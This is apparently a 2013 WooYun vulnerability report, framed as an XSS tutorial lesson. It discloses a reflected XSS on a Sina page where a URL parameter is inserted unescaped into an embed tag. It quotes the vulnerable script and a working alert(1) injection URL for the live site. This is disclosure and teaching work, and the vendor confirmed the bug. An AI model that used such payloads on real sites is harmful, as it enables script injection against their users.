当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-017519

漏洞标题:[新浪XSS一课一练]瘦子XSS教程第一课深入:典型XSS的检测

相关厂商:新浪

漏洞作者: 专注XSS三十年

提交时间:2013-01-19 10:40

修复时间:2013-03-05 10:41

公开时间:2013-03-05 10:41

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:1

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-01-19: 细节已通知厂商并且等待厂商处理中
2013-01-19: 厂商已经确认,细节仅向厂商公开
2013-01-29: 细节向核心白帽子及相关领域专家公开
2013-02-08: 细节向普通白帽子公开
2013-02-18: 细节向实习白帽子公开
2013-03-05: 细节向公众公开

简要描述:

第一课 http://www.wooyun.org/bugs/wooyun-2010-015957
新浪的XSS自然比腾讯更多,这里只讨论IE浏览器下的情况,其它浏览器可能需要做一些变形。
纯粹的完全无过滤确实不太好找,这个其实是输出在HTML属性里,严格来说应该算是第三课的扩展,不过算了,勉强算是没有任何过滤吧。第三课的时候我找个输出在<input value= 的例子。

详细说明:

漏洞地址:
http://bt.house.sina.com.cn/zdy/page/lc600_sp.html?url=68397653_2202974785_Z0u3GCJuDm7K+l1lHz2stqkP7KQNt6nni2q2slWgIgZcQ0/XM5Gfat4O5y/TA9kEqDhAQpA8fPkg0h4
漏洞成因:

var str=window.location.href;
var es=/url=/;
es.exec(str);
var right=RegExp.rightContext;
……
<embed id=sp pluginspage='http://www.macromedia.com/go/getflashplayer' src='http://you.video.sina.com.cn/api/sinawebApi/outplayrefer.php/vid="+right+"/s.swf' type=……


URL取得的内容未做任何过滤,直接带入到embed标签内。很典型的XSS。
构造地址:

http://bt.house.sina.com.cn/zdy/page/lc600_sp.html?url=11">'><img src=1 onerror=alert(1);><textarea>


附加说明:
1 为啥要用">'>:实际测试中,如果我用单引号,引用地址会变成双引号;如果我用双引号,它就用单引号引用。我怒了, 干脆都加上,总有一款适合你。
2 最近比较喜欢使用<textarea>屏蔽后面的东西。
3 如果有时间,我可能会专门做一期XSS代码对于各个浏览器兼容的处理。

漏洞证明:

sina1.jpg

修复方案:

嗯..问瘦子。

版权声明:转载请注明来源 专注XSS三十年@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2013-01-19 18:23

厂商回复:

谢谢 修复中

最新状态:

暂无